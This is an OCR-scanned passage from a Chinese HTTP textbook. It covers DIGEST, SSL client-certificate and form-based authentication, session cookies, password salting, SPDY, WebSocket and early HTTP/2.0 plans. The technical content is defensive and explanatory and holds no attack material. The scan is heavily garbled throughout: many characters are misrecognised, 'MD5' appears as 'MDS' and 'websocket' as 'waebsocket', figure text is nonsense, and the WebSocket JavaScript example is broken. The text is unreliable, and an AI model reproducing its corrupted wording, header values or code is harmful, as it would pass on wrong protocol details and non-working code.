nonce="MOSQZONBAA=44abb86784cc9cbfc605a5b0893d36f23de951 
cff", uri="/digest"”, algorithm=MDS,. 
response= "df6389ba3f7c52e9d7551115d67472f , qop=auth. 
nc=00000001, cnonce="082c875dcb2ca740" 















认证 成 功 返 回 状态 码 200， 失 败 则 再 次 发 送 状态 码 401 
_ HTTP/1.1 200 OK 
172 Authentication-Info: 
172 rspauth="f218e9ddb407a3d16f2f7d2c4097e900"， 





cnonce="082c875dcb2ca740", nc=00000001, qop=auth 


: DIGEST 认证 概要 


步骤 1: 请求 需 认 证 的 资源 时 ， 服 务 带 会 随 大 状态 亿 401 Authorization 
Required， 返 回 带 WWW-Authenticate 首部 字段 的 响应 。 
该 字段 内 包含 质问 啊 应 方式 认证 所 需 的 临时 质询 码 (随机 
数 ，nonce )。 
首部 宇 段 WWW-Authenticate 内 必须 包含 realm 和 nonce 
这 两 个 字段 的 信息 。 客 户 端 就 是 依靠 回 服务 需 回 送 这 两 个 
值 进行 认证 的 。 
nonce 是 一 种 每 次 随 返 回 的 401 响应 生成 的 任意 随机 字符 
囊 。 该 字符 串通 第 推荐 由 Base64 编码 的 十 六 进 制 数 的 组 
成 形式 ,但 实际 内 容 依 赖 服务 佛 的 具体 实现 。 

步骤 2: 接收 到 401 状态 码 的 客户 端 ， 返 回 的 啊 应 中 包含 DIGEST 
认证 必须 的 首部 字段 Authorization 信息 。 
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首部 字段 Authorization 内 必须 包 合 username、realm、 
nonce 、uri 和 response 的 字段 信息 。 其 中 ，realm 和 nonce 
怠 是 之 前 从 服务 硕 接 收 到 的 啊 应 中 的 字段 ， 
username 是 realm 限定 范围 内 可 进行 认证 的 用 户 和 名。 
uri ( digest-uri ) 即 Request-URI 的 值 ， 但 考虑 到 经 代理 转 
发 后 Request-URI 的 值 可 能 被 修改 ， 因 此 事先 会 复制 一 份 
副本 保存 在 uri 内 。 
response 也 可 叫做 Request-Digest， 存 放 经 过 MDS 运算 后 
的 密码 字符 串 ， 形 成 啊 应 码 。 
响应 中 其 他 的 实体 请 参见 第 6 章 的 请 求 首 部 字段 
Authorization。 另 外 ， 有 关 Request-Digest 的 计算 规则 较 复 
水 ， 有 兴趣 的 谈 者 不 妨 深 人 学 习 一 下 RFC2617。 

步骤 3: ”接收 到 包含 首部 字段 Authorization 请 求 的 服务 器 ， 会 确认 
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兴 证 信息 的 正确 性 。 认 证 通过 后 则 返回 包 售 RequestrURI “一 


资源 的 啊 应 。 
并 且 这 时 会 在 首部 字段 Authentication-Info 写 人 一 些 认证 
成 功 的 相关 信息 。 


DIGEST 认证 提供 了 高 于 BASIC 认证 的 安全 等 级 ,但 是 和 
HTTPS 的 客户 端 认证 相 比 仍旧 很 弱 。DIGEST 认证 提供 防 
止 密码 被 寡 听 的 保护 机 制 ， 但 并 不 存在 防止 用 户 伪 家 的 全 
护 机 制 。 

DIGEST 认证 和 BASIC 认证 一 样 ， 使 用 上 不 那么 便捷 灵 
活 ， 且 仍 达 不 到 多 数 Web 网 站 对 高 度 安全 等 级 的 追求 标 
准 。 因 此 它 的 适用 范围 也 有 所 受 限 。 


8.4 SSL 客户 端 认 证 
从 使 用 用 户 ID 和 密码 的 认证 方式 方面 来 讲 ， 只 要 二 者 的 内 容 正 确 ， 


EE 


即 可 认证 是 本 人 的 行为 。 但 如 果 用 户 ID 和 密码 被 盗 ， 就 很 有 可 能 被 第 
三 者 冒充 。 利 用 SSL 客户 端 认 证 则 可 以 避免 该 情况 的 发 生 。 

SSL 客户 端 认证 是 借 由 HTTPS 的 客户 端 证 书 完成 认证 的 方式 。 途 
借 客户 端 证 书 (在 HTTPS 一 章 已 讲解 ) 认证 ， 服 务 器 可 确认 访问 是 否 
来 自己 登录 的 客户 端 。 


8.4.1 SSL 客户 端 认证 的 认证 步骤 
为 达到 SSL 客户 端 认 证 的 目的 ， 需 要 事先 将 客户 端 证 书 分 发 给 客户 
端 ， 且 客户 端 必须 安装 此 证 书 。 
步骤 1: 接收 到 需要 认证 资源 的 请 求 ， 服 务 胡 会 发 送 Certificate 
Request 报 文 ， 要 求 客户 端 提 供 客户 端 证 书 。 
步骤 2: 用 户 选 择 将 发 送 的 客户 端 证 书后 ， 客 户 并 会 把 客户 端 证 书 
信息 以 Client Certificate 报 文 方式 发 送 给 服务 请。 


i 





| 详细 信息 | 证 书目 茎 
| | 上 有 。 证 书信 息 
| 这 个 证 书 的 目的 如 下 : 

| 。 保证 远程 计 戎 贡 的 身份 
, 向 迅 寿 计算 机 三 二 堆 的 身 雪 
6 
重 Fe 1 康生， bs LIS730.4, 1 

” 。 有 美 主 拭 信息 ， 请 参考 证 书 癸 委 机 构 的 说 明 。 


十 重 榈 :entryll.bk.auig. jp 


里 恬 者 :Verisign Class 3 Extended Validation 55L | 
Het Ch 


有 交 末 从 。 性 明 二 = M4 到 巡 其 入 后 =- 1 
| 





et 


图 : 选择 客户 端 证 书 示例 ( 三 蓉 东 京 UFJ 银行 ) 


和 Ta ES a 


步骤 3: ”服务 器 验证 客户 端 证 书 验证 通过 后 方 可 领取 证 书 内 客户 端 
的 公开 密 钥 ， 然 后 开始 HTTPS 加 密 通 信 。 
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8.4.2 SSL 客户 贤 认 证 采用 双 因 素 认 证 

在 多 数 情况 下 ，SSL 客户 端 认 证 不 会 仅 依靠 证 书 完成 认证 ， 一 般 会 
和 基于 表单 认证 ( 稍 后 讲解 ) 组 合 形成 一 种 双 因 素 认 证 ( Two-factor 
authentication ) 来 使 用 。 所 谓 双 因 素 认 证 就 是 指 ， 认 证 过 程 中 不 仅 需要 
密码 这 一 个 因素 ， 还 需要 申请 认证 者 提供 其 他 持 有 信息 ， 从 而 作为 另 一 
个 因素 ， 与 其 组 合 使 用 的 认证 方式 。 

换言之 ， 第 一 个 认证 因素 的 SSL 客户 端 证 书 用 来 认证 客户 端 计算 
机 ， 男 一 个 认证 因素 的 密码 则 用 来 确定 这 是 用 户 本 人 的 行为 。 

通过 双 因 素 认证 后 ， 就 可 以 确认 是 用 户 本 人 正在 使 用 匹配 正确 的 计 
算 机 访问 服务 器 。 


8.4.3 SSL 客 尸 端 认 证 必要 的 费用 

使 用 SSL 客户 端 认 证 需要 用 到 客户 端 证 书 。 而 客户 端 证 书 需 要 文 
付 一 定 费 用 才能 使 用 。 

这 里 提 到 的 费用 是 指 ， 从 认证 机 构 购 买 客户 端 证 书 的 费用 ， 以 及 服 
务 器 运营 者 为 保证 自己 搭建 的 认证 机 构 安全 运营 所 产生 的 费用 。 

每 个 认证 机 构 颁 发 客户 端 证 书 的 费用 不 尽 相 同 ， 平 挫 到 一 张 证 书 
上 ， 一 年 费用 约 几 万 至 十 几 万 日 元 。 服 务 器 运营 者 也 可 以 自己 搭建 认证 
机 构 ， 但 要 维持 安全 运行 就 会 产生 相应 的 费用 。 


8.5 ”基于 表单 认证 

基于 表单 的 认证 方法 并 不 是 在 HTTP 协议 中 定义 的 。 客 户 端 会 向 服 
务 器 上 的 Web 应 用 程序 发 送 登 录 信 息 ( Credential )， 按 登录 信息 的 验证 
结果 认证 。 

根据 Web 应 用 程序 的 实际 安装 ， 提 供 的 用 户 界面 及 认证 方式 也 各 
不 相同 。 


(Cail 
Google 提供 的 电子 邮件 服务 ， 


| “ Gmail 的 开发 理念 是 ,电子 邮件 可 以 更 加 直观 ， 高 效 而 详 用 ， 甚 译 可 
能 很 有 乔 ， 毕 误 ，Gmail 具有 以 下 特点 : 


© coore 
ji Google 的 创新 技术 可 以 将 垃圾 邮件 拒 于 收 件 箱 之 


人 
将 手机 的 网 络 浏览 吕 指 向 http://gmail.com ， 便 可 以 
在 您 的 手机 上 音 阅 Gmail， 了 解 详情 


管 si 
超过 7497.396475 MB ( 还 在 不 断 增 加 ) 的 免费 存储 空 
间 ， 





: 基于 表单 认证 示例 ( Google ) 


多 数 情 况 下 ， 输 入 已 事先 登录 的 用 户 ID ( 通常 是 任意 字符 串 或 邮件 
地 址 ) 和 密码 等 登录 信息 后 ， 发 送 给 Web 应 用 程序 ， 基 于 认证 结 采 来 
决定 认证 是 否 成 功 。 


8.5.1 认证 多 半 为 基于 表单 认证 

由 于 使 用 上 的 便利 性 及 安全 性 问题 ，HTTP 协议 标准 提供 的 BASIC 
认证 和 DIGEST 认证 几乎 不 怎么 使 用 。 另 外 ，SSL 客户 疹 认 证 虽然 具有 
高 度 的 安全 等 级 ， 但 因为 导 和 人 及 维持 费用 等 问题 ， 还 尚未 普及 。 

比如 SSH 和 FTP 协议 ,服务 器 与 客户 问 之 间 的 认证 是 合乎 标准 规 
范 的 ， 并 且 满 足 了 最 基本 的 功能 需求 上 的 安全 使 用 级 别 ， 因 此 这 些 协议 
的 认证 可 以 拿 来 直接 使 用 。 但 是 对 于 Web 网 站 的 认证 功能 ， 能 够 满足 
其 安全 使 用 级 别 的 标准 规范 并 不 存在 ， 所 以 只 好 使 用 由 Web 应 用 程序 
各 上 自 实现 基于 表单 的 认证 方式 。 

不 具备 共同 标准 规范 的 表单 认证 ， 在 每 个 Web 网 站 上 都 会 有 各 不 
相同 的 实现 方式 。 如 果 是 全 面 考虑 过 安全 性 能 而 实现 的 表单 认证 ， 那 么 
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就 能 够 具备 高 度 的 安全 等 级 。 但 在 表单 认证 的 实现 中 存在 问题 的 Web 
网 站 也 是 屡见不鲜 。 


8.5.2 Session 管理 及 Cookie 应 用 

基于 表单 认证 的 标准 规范 尚未 有 定论 ， 一 般 会 使 用 Cookie 来 管理 
Session ( 会 话 )。 

基于 表单 认证 本 身 是 通过 服务 器 端的 Web 应 用 ， 将 客户 判 发 送 过 
来 的 用 户 ID 和 密码 与 之 前 登录 过 的 信息 做 匹配 来 进行 认证 的 。 

但 鉴于 HTTP 是 无 状态 协议 ， 之 前 已 认证 成 功 的 用 户 状态 无 法 通过 
协议 层面 保存 下 来 。 即 ， 无 法 实现 状态 管理 ， 因 此 即使 当 该 用 户 下 一 次 
继续 访问 ， 也 无 法 区 分 他 与 其 他 的 用 户 。 于 是 我 们 会 使 用 Cookie 来 管 
理 Session， 以 弥补 HTTP 协议 中 不 存在 的 状态 管理 功能 。 


客户 疹 
由) 发 送 已 登录 信息 ( 用 户 ID， 密 码 ) 





GD) 发 送 包 含 Session ID 的 Cookie 
Set-Cookie: PHPSESSID=028a8c...; 


四 ) 发 送 包 含 Session ID 的 Cookie 
Cookle: PHPSESSID=028a8c.., 








图 : Session 管理 及 Cookie 状态 管理 


步骤 1: ”客户 端 把 用 户 ID 和 密码 等 登录 信息 放 入 报 文 的 实体 部 分 ， 
通常 是 以 POST 方法 把 请 求 发 送 给 服务 器 。 而 这 时 ， 会 使 
用 HTTPS 通信 来 进行 HTML 表单 画面 的 显示 和 用 户 输入 
数据 的 发 送 。 

步骤 2: 服务 器 会 发 放 用 以 识别 用 户 的 Session ID。 通 过 验证 从 客 





户 闪 发 送 过 来 的 登录 信息 进行 身份 认证 ， 然 后 把 用 户 的 认 
证 状态 与 Session ID 绑 和 定 后 记录 在 服务 套 端 。 

问 客户 端 返回 啊 应 时 ， 会 在 首部 字段 Set-Cookie 内 写 人 
Session ID (如 PHPSESSID=028a8c… )。 

尔 可 以 把 Session ID 想象 成 一 种 用 以 区 分 不 同 用 户 的 等 位 号 。 
然而 ， 如 果 Session ID 被 第 三 方 盗 走 ， 对 方 就 可 以 伪 闻 成 你 的 
叶 份 进行 恶意 操作 了 。 因 此 必须 防止 Session ID 被 盗 ， 或 被 
猿 出 。 为 了 做 到 这 点 ，Session ID 应 使 用 难以 推测 的 字符 串 ， 
且 服 务 器 端 也 需要 进行 有 效 期 的 管理 ， 保 证 其 安全 性 。 
男 外 ， 为 减轻 跨 站 脚本 攻击 (XSS ) 造成 的 损失 ， 建 议事 
先 在 Cookie 内 加 上 httponly 属性 。 

步骤 3: 客户 问 接 收 到 从 服务 器 病 发 来 的 Session ID 后 ， 会 将 其 作 

为 Cookie 保存 在 本 地 。 下 次 向 服务 器 发 送 请 求 时 ， 浏 览 右 
会 自动 发 送 Cookie， 所 以 Session ID 也 随 之 发 送 到 服务 器 。 
服务 器 端 可 通过 验证 接收 到 的 Session ID 识别 用 户 和 其 认 








除了 以 上 介绍 的 应 用 实例 ， 还 有 应 用 其 他 不 同方 法 的 案例 。 

另外 ， 不 仅 基 于 表单 认证 的 登录 信息 及 认证 过 程 都 无 标准 化 的 方 
法 ， 服 务 咒 端 应 如 何 保存 用 户 提交 的 密码 等 登录 信息 等 也 没有 标准 化 。 

通常 ， 一 种 安全 的 保存 方法 是 ， 先 利用 给 密码 加 盐 ( salt ) “的 方式 
增加 额外 信息 ， 再 使 用 散 列 ( hash ) 函数 计算 出 散 列 值 后 保存 。 但 是 我 
们 也 经 常 看 到 直接 保存 明文 密码 的 做 法 ， 而 这 样 的 做 法 具有 导致 密码 泄 
露 的 风险 。 


(QD salt 其 实 就 是 由 服务 器 随机 生成 的 一 个 字符 串 ， 但 是 要 保证 长 度 足 够 长 ， 并 
且 是 真正 随机 生成 的 。 然 后 把 它 和 密码 字符 串 相 连接 (前 后 都 可 以 ) 生成 散 
列 值 。 当 两 个 用 户 使 用 了 同一 个 密码 时 ， 由 于 随机 生成 的 salt 值 不 同 ， 对 应 
的 散 列 值 也 特 是 不 同 的 。 这 样 一 来 ， 很 大 程度 上 减少 了 密码 特征 ， 攻 击 者 也 
就 很 难 利用 自己 手中 的 密码 特征 库 进 行 破解 。 一 一 译 者 注 





第 9 章 
基于 HTTP 的 功能 追加 协议 
虽然 HTTP 协议 既 简 单 又 简捷 ， 但 随 着 时 代 的 发 展 ,其 功能 使 用 上 


捉襟见肘 的 疲 访 已 经 凸显 。 本 章 我 们 将 讲解 基于 HTTP 新 增 的 功 
能 的 协议 。 














9.1 基于 HTTP 的 协议 


在 建立 HTTP 标准 规范 时 ， 制 订 者 主要 想 把 HTTP 当 作 传 输 HTML 
文档 的 协议 。 随 着 时 代 的 发 展 ，Web 的 用 途 更 具 多 样 性 ， 比 如 演化 成 在 
线 购物 网 站 、SNS ( Social Networking Service， 社 交 网 络 服务 )、 企 业 或 
组 织 内 部 的 各 种 管理 工具 ， 等 等 。 

而 这 些 网 站 所 追求 的 功能 可 通过 Web 应 用 和 脚本 程序 实现 。 即 使 
这 些 功 能 已 经 满足 需求 ， 在 性 能 上 却 未 必 最 优 ， 这 是 因为 HTTP 协议 上 
的 限制 以 及 目 喘 性 能 有 限 。 

HTTP 功能 上 的 不 足 可 通过 创建 一 套 全 新 的 协议 来 弥补 。 可 是 目前 
基于 HTTP 的 Web 浏览 器 的 使 用 环境 已 遍布 全 球 ， 因 此 无 法 完全 抛弃 
HTTP。 有 一 些 新 协议 的 规则 是 基于 HTTP 的 ， 并 在 此 基础 上 话 加 了 新 
的 功能 。 


9.2 ”消除 HTTP 瓶颈 的 SPDY 


Google 在 2010 年 发 布 了 SPDY ( 取 自 SPeeDY， 发 音 同 speedy )， 
其 开发 目标 旨 在 解决 HTTP 的 性 能 瓶颈 ， 缩 短 Web 页 面 的 加 载 时 间 
( $50% ), 
® SPDY - [he Chromium Projects 
http://www.chromium.org/spdy/ 


9.2.1 HTTP 的 瓶颈 

在 Facebook 和 Twitter 等 SNS 网 站 上 ， 几 乎 能 够 实时 观察 到 海量 用 
户 公 开发 布 的 内 容 ， 这 也 是 一 种 乐趣 。 当 几 百 、 几 千 万 的 用 户 发 布 内 容 
时 ，Web 网 站 为 了 保存 这 些 新 增 内 容 ， 在 很 短 的 时 间 内 就 会 发 生 大 量 的 
内 容 更 新 . 

为 了 尽 可 能 实时 地 显示 这 些 更 新 的 内 容 ， 服 务 关 上 一 有 内 容 更 新 ， 
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就 需要 直接 把 那些 内 容 反 馈 到 客户 端的 界面 上 。 虽 然 看 起 来 挺 简单 的 ， 
但 HTTP 却 无 法 妥善 地 处 理 好 这 项 任务 。 

使 用 HTTP 协议 探知 服务 器 上 是 否 有 内 容 更 新 ， 就 必须 频繁 地 从 客 
户 端 到 服务 器 端 进行 确认 。 如 果 服 务 器 上 没有 内 容 更 新 ， 那 么 就 会 产生 
徒劳 的 通信 。 

若 想 在 现 有 Web 实现 所 需 的 功能 ， 以 下 这 些 HTTP 标准 就 会 成 为 
瓶颈 。 


9 一 条 连接 上 只 可 发 送 一 个 请 求 。 

9 请 求 只 能 从 客户 端 开 始 。 客 户 端 不 可 以 接收 除 响应 以 外 的 指令 。 
9 请 求 / 响应 首部 未 经 压缩 就 发 送 。 首 部 信息 越 多 延迟 越 大 。 

9 发送 元 长 的 首部 。 每 次 互相 发 送 相同 的 首部 造成 的 泥 费 较 多 。 
9 可 任意 选择 数据 压缩 格式 。 非 强制 压缩 发 送 。 





图 : 以 前 的 HTTP 通信 








Ajax 的 解决 方法 

Ajax ( Asynchronous JavaScript and XML， 异 步 JavaScript 与 XML 
技术 ) 是 一 种 有 效 利用 JavaScript 和 DOM ( Document Object Model， 文 
档 对 象 模型 ) 的 操作 ， 以 达到 局 部 Web 页 面 苦 换 加 载 的 异步 通信 手段 。 
和 以 前 的 同步 通信 相 比 ， 由 于 它 只 更 新 一 部 分 页 面 ， 响 应 中 传输 的 数据 
量 会 因此 而 减少 ， 这 一 优点 显而易见 。 

Ajax 的 核心 技术 是 名 为 XMLHttpRequest 的 API， 通 过 JavaScript 
脚本 语言 的 调用 就 能 和 服务 器 进行 HTTP 通信 。 借 由 这 种 手段 ， 就 能 从 
已 加 载 完毕 的 Web 页 面 上 发 起 请 求 ， 只 更 新 局 部 页 面 。 

而 利用 Ajax 实时 地 从 服务 器 获取 内 容 ， 有 可 能 会 寻 致 大 量 请 求 产 
生 。 男 外 ，Ajax 仍 未 解决 HTTP 协议 本 身 存 在 的 问题 。 





< 页 面 的 局 部 更 
新 可 能 实现 > 






四 


每 次 都 互相 发 送 相同 的 首部 








图 : Ajax 通信 


Comet 的 解决 方法 
一 日 服务 器 端 有 内 容 更 新 了 ，Comet 不 会 让 请 求 等 待 ， 而 是 直接 给 
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客户 端 返回 啊 应 。 这 是 一 种 通过 延迟 应 答 ， 模 拟 实 现 服务 器 端 癌 客户 端 
推送 ( Server Push ) 的 功能 。 

通常 ， 服 务 如 问 接 收 到 请 求 ， 在 处 理 完毕 后 就 会 立即 返回 啊 应 ,但 
为 了 实现 推送 功能 ，Comet 会 先 将 啊 应 置 于 挂 起 状态 ， 当 服务 器 端 有 内 
容 更 新 时 ， 再 退回 该 啊 应 。 因 此 ， 服 务 硕 奖 一 旦 有 更 新 ， 就 可 以 立即 反 
乌 给 客户 痊 。 

内 容 上 虽然 可 以 做 到 实时 更 新 ,但 为 了 保留 啊 应 ， 一 次 连接 的 持续 
时 间 也 变 长 了 。 期 间 ， 为 了 维持 连接 会 消耗 更 多 的 资源 。 为 外 ，Comet 
也 仍 未 解决 HTTP 协议 本 身 存在 的 问题 。 


“3| | < 保留 响应 直 | 
| 到 服务 器 内 容 








< 可 实现 页 面 的 


二 一 旦 更 新 可 立即 
| 局 部 更 新 > 


有 时 不 压缩 数 
一 据 直 接 发 送 





图 : Comet 通信 


SPDY 的 目标 

陆续 出 现 的 Ajax 和 Comet 等 提高 易 用 性 的 技术 ， 一 定 程 度 上 使 
HTTP 得 到 了 改善 ， 但 HTTP 协议 本 号 的 限制 也 令 人 有 些 束 手 无 案 。 为 
了 进行 根本 性 的 改善 ， 需 要 有 一 些 协议 层面 上 的 改动 。 











处 于 持续 开发 状态 中 的 SPDY 协议 ， 正 是 为 了 在 协议 级 别 消除 
HTTP 所 遭遇 的 瓶颈 。 


9.2.2 SPDY 的 设计 与 功能 

SPDY 没有 完全 改写 HTTP 协议 ， 而 是 在 TCP/PP 的 应 用 层 与 运输 
层 之 间 通 过 新 加 会 话 层 的 形式 运作 。 同 时 ， 考 虑 到 安全 性 问题 ，SPDY 
规定 通信 中 使 用 SSL。 

SPDY 以 会 话 层 的 形式 加 入 ,控制 对 数据 的 流动 ， 但 还 是 采用 
HTTP 建立 通信 连接 。 因 此 ， 可 照常 使 用 HTTP 的 GET 和 POST 等 方 
法 、Cookie 以 及 HTTP 报 文 等 。 


”| 应 用 层 


会 话 层 





表示 层 


”| 传输 层 





SPDY 介 于 TCP(SSL 和 HTTP 之 间 


图 : SPDY 的 设计 
使 用 SPDY 后 ，HTTP 协议 额外 获得 以 下 功能 。 


多 路 复 用 流 

通过 单一 的 TCP 连接 ， 可 以 无 限制 处 理 多 个 HTTP 请 求 。 所 有 
请 求 的 处 理 都 在 一 条 TCP 连接 上 完成 ， 因 此 TCP 的 处 理 效 率 得 到 
提高 。 


赋予 请 求 优 先 级 
SPDY 不 仅 可 以 无 限制 地 并 发 处 理 请 求 ， 还 可 以 给 请 求 逐 个 分 配 优 
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先 级 顺序 。 这 样 主要 是 为 了 在 发 送 多 个 请 求 时 ， 解 决 因 市 宽 低 而 导 
致 啊 应 变 慢 的 问题 。 


压缩 HTTP 首部 
压缩 HTTP 请 求 和 啊 应 的 首部 。 这 样 一 来 ， 通 信和 产生 的 数据 包 数 量 
和 发 送 的 字 节 数 就 更 少 了 。 


推送 功能 
支持 服务 融 主 动向 客户 端 推送 数据 的 功能 。 这 样 ， 服 务 器 可 下 接 发 
送 数据 ， 而 不 必 等待 客 户 端的 请 求 。 


服务 怖 提示 功能 

服务 紫 可 以 主动 提示 客户 端 请 求 所 需 的 资源 。 由 于 在 客 尸 端 发 现 帝 
源 之 前 就 可 以 获知 资源 的 存在 ， 因 此 在 资源 已 缓存 等 情况 下 ， 可 以 
避免 发 送 不 必要 的 请 求 。 


9.2.3 SPDY 消除 Web 瓶颈 了 吗 

希望 使 用 SPDY 时 ，Web 的 内 容 端 不 必 做 什么 特别 改动 ， 而 Web 
浏览 器 及 Web 服务 器 都 要 为 对 应 SPDY 做 出 一 定 程度 上 的 改动 。 有 好 
几 家 Web 浏览 大 已 经 针对 SPDY 做 出 了 相应 的 调整 。 为 外 ，Web 服务 
器 也 进行 了 实验 性 质 的 应 用 ,但 把 该 技术 导入 实际 的 Web 网 站 却 进展 
不 佳 。 

因为 SPDY 基本 上 只 是 将 单个 域名 (IP 地址 ) 的 通信 多 路 复 用 ， 
所 以 当 一 个 Web 网 站 上 使 用 多 个 域名 下 的 资源 ， 改 善 效果 就 会 受到 
限制 。 

SPDY 的 确 是 一 种 可 有 效 消除 HTTP 瓶颈 的 技术 ， 但 很 多 Web 网 
站 存在 的 问题 并 非 仅 仅 是 由 HTTP 瓶颈 所 导致 。 对 Web 本 身 的 速度 提 
升 ， 还 应 该 从 其 他 可 细致 钻研 的 地 方 人 手 ， 比 如 改善 Web 内 容 的 编写 
方式 等 。 








ei 


加 由 加 况 


9.3 ”使 用 浏览 器 进行 全 双 工 通信 的 WebSocket 


利用 Ajax 和 Comet 技术 进行 通信 可 以 提升 Web 的 浏览 速度 。 但 问 
题 在 于 通信 者 使 用 HTTP 协议 ， 就 无 法 彻底 解决 瓶颈 问题 。WebSocket 
网 络 技术 正 是 为 解决 这 些 问题 而 实现 的 一 套 新 协议 及 API。 

当时 筹划 将 WebSocket 作为 HTMLS 标准 的 一 部 分 ， 而 现在 它 却 逐 
渐变 成 了 独立 的 协议 标准 。WebSocket 通信 协议 在 2011 年 12 月 11 日 ， 
外 RFC 6455 - The WebSocket Protocol 定 为 标准 。 


9.3.1 WebSocket 的 设计 与 功能 

WebSocket， 即 Web 浏览 器 与 Web 服务 器 之 间 全 双 工 通信 标准 。 其 
中 ，WebSocket 协议 由 IETF 定 为 标准 ，WebSocket API 由 W3C 定 为 标 
准 。 仍 在 开发 中 的 WebSocket 技术 主要 是 为 了 解决 Ajax 和 Comet 里 
XMLHttpRequest 附带 的 缺陷 所 引起 的 问题 。 


9.3.2 WebSocket 协议 

一 旦 Web 服务 需 与 客户 端 之 间 建 立 起 WebSocket 协议 的 通信 连接 ， 
之 后 所 有 的 通信 都 依靠 这 个 专用 协议 进行 。 通 信 过 程 中 可 互相 发 送 
JSON、XML 、HTML 或 图 片 等 任意 格式 的 数据 。 

由 于 是 建立 在 HTTP 基础 上 的 协议 ， 因 此 连接 的 发 起 方 仍 是 客户 
端 ， 而 一 旦 确立 WebSocket 通信 连接 ， 不 论 服 务 器 还 是 客户 端 ， 任 意 一 
方 都 可 直接 问 对 方 发 送 报 文 。 

下 面 我 们 列举 一 下 WebSocket 协议 的 主要 特点 。 


jE LT 
推 达 功能 


文 持 由 服务 右 回 客户 闪 推 送 数据 的 推送 功能 。 这 样 ， 服 务 侦 可 直接 
发 送 数据 ， 而 不 必 等 待 客户 端的 请 求 。 
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只 要 建立 i 就 希望 一 直 保 持 连 接 状 态 。 和 HTTP 
相 比 ， 不 但 每 次 连接 时 的 总 开销 减少 ， 而 且 由 于 WebSocket 的 首部 
信息 很 小 ， 通 信 量 也 相应 减少 了 。 


为 了 实现 WebSocket 通信 , 在 HTTP 连接 建立 之 后 ， 需 要 完成 一 次 
“握手 ”( Handshaking ) 的 步骤 。 


国 握 手 : 请 求 
为 了 实现 WebSocket 通信 ， 需 要 用 到 HTTP 的 Upgrade 自 部 字段 ， 
告知 服务 器 通信 协议 发 生 改变 ， 以 达到 握手 的 目的 。 


GET /chat HTTP/1.1 

Host: server.example .com 

Upgrade: waebsocket 

Connection: Upgrade 

Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25j20Q== 
Origin: http://example.com 

Sec-WebSocket -Protocol: chat, superchat 
Sec-WebSocket -Version: 13 


Sec-WebSocket-Key 字段 内 记录 着 握手 过 程 中 必 不 可 少 的 键 值 。 
Sec-WebSocket-Protocol 字段 内 记录 使 用 的 子 协议 。 

子 协议 按 WebSocket 协议 标准 在 连接 分 开 使 用 时 ， 定 义 那些 连接 的 
名 称 。 


加 握手 * 啊 应 
对 于 之 前 的 请 求 ， 返 回 状态 码 101 Switching Protocols 的 响应 。 


HTTP/1.1 101 Switching Protocols 
Upgrade: websocket 








Connection: Upgrade i 
Sec-WebSocket -Accept: s3pPLMBiTXxaQ9kYGZ2h2RbK+xOo0= > 
Sec-WebSocket -Protocol: chat : 


Sec-WebSocket-Accept 的 字段 值 是 由 握手 请 求 中 的 Sec-WebSocket- 
Key 的 字段 值 生成 的 。 

成 功 握手 确立 WebSocket 连接 之 后 ， 通 信 时 不 再 使 用 HTTP 的 数据 
帧 ， 而 采用 WebSocket 独立 的 数据 帆 。 





服务 器 








连接 刚 开 始 时 还 是 
HTTP 协 议 , 所 以 由 
HTTP 客户 端 先 发 起 连接 
101 Switching Protocols | 
WebSocket 的 URL 格 式 
ws://example.com/ 
VWebSocket 发 送 数 据 wss://lexample.com/ 
WebSocket 协 议 支 
发 送 数 据 持 全 双 工 通信 ， 因 
和 此 服务 器 应 不 必 等 
发 送 数 据 待 请 求 , 可 直接 发 
re 送 数 据 
图 : WebSocket 通信 
国 WebSocket API 


JavaScript 可 丧 用 “The WebSocket API ( http://www.w3.0org/TR/ 
websockets/， 由 W3C 标准 制定 ) 内 提供 的 WebSocket 程序 接口 ， 以 : 
现 WebSocket 协议 下 全 双 工 通信 。 

以 下 为 调用 WebSocketAPI， 每 50ms 发 送 一 次 数据 的 实例 。 
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Var socket = new WebSocket ('ws://game .example.com: 9 ; 
socket .onopen = function () { 
setInterval (function() | 
if (lsocket .bufferedAmount == 0) 
socket .send (getUpdateData()); 
}, 50); 


}; 


9.4 ”期 盼 已 久 的 HTTP/2.0 


目前 主流 的 HTTP/1.1 标准 ， 自 1999 年 发 布 的 RFC2616 之 后 再 未 
进行 过 改 订 。SPDY 和 WebSocket 等 技术 纷纷 出 现 ， 很 难 断言 HTTP/1.1 
仍 是 适用 于 当下 的 Web 的 协议 。 

负责 互联 网 技术 标准 的 IETF ( Internet Engineering Task Force， 互 
联网 工程 任务 组 ) 创立 httpbis ( Hypertext Transfer Protocol Bis ，http:/W/ 
datatracker.ietf.org/wg/httpbis/ ) 工作 组 ， 其 目标 是 推进 下 一 代 HTTP 一 一 
HTTP/2.0 在 2014 年 11 月 实现 标准 化 。 


HTTP/2.0 的 特点 

HTTP/2.0 的 目标 是 改善 用 户 在 使 用 Web 时 的 速度 体验 。 由 于 基本 
上 都 会 先 通过 HTTP/1.1 与 TCP 连接 ， 现 在 我 们 以 下 面 的 这 些 协 议 为 基 
础 ， 探 讨 一 下 它们 的 实现 方法 。 


全 SPDY 
$$ HTIP Speed + Mobility 
® Network-Friendly HTTP Upgrade 


HTTP Speed + Mobility 由 微软 公司 起 草 ， 是 用 于 改善 并 提高 移动 
端 通信 时 的 通信 速度 和 性 能 的 标准 。 它 建立 在 Google 公司 提出 的 
SPDY 与 WebSocket 的 基础 之 上 。 

Network-Friendly HTTP Upgrade 主要 是 在 移动 端 通信 时 改善 HTTP 


aa 
性 能 的 标准 。 


HTTP/2.0 的 7 项 技术 及 讨论 

HTTP/2.0 围绕 着 主要 的 7 项 技术 进行 讨论 ， 现 阶段 (2012 年 8 月 
13 日 )， 大 都 倾 问 于 采用 以 下 协议 的 技术 。 但 是 ， 讨 论 仍 在 持续 ， 所 以 
不 能 排除 会 发 生 重 大 改变 的 可 能 性 。 


表 9-1 







Te 
Fi Speed + Mobility, Friendly 


客户 端 拉 曙 ( Client Pull ) /服务 器 推送 Speed + Mobility 
( Server Push ) 


流量 控制 | SPDY 
WebSocket Speed + Mobility 


注 : HTTP Spaag + Mobility 简 写 为 Speed + Mobility, Network-Frnendly HTTP Upgrade 
简写 为 Friendly。 











| 由 


9.5 ”Web 服务 器 管理 文件 的 WebDAV 


WebDAV ( Web-based Distributed Authoring and Versioning， 基 于 万 
维 网 的 分 布 式 创作 和 版 本 控制 ) 是 一 个 可 对 Web 服务 器 上 的 内 容 直 接 
进行 文件 复制 、 编 辑 等 操作 的 分 布 式 文件 系统 。 它 作为 扩展 HTTP/1.1 
的 协议 定义 在 RFC4918。 

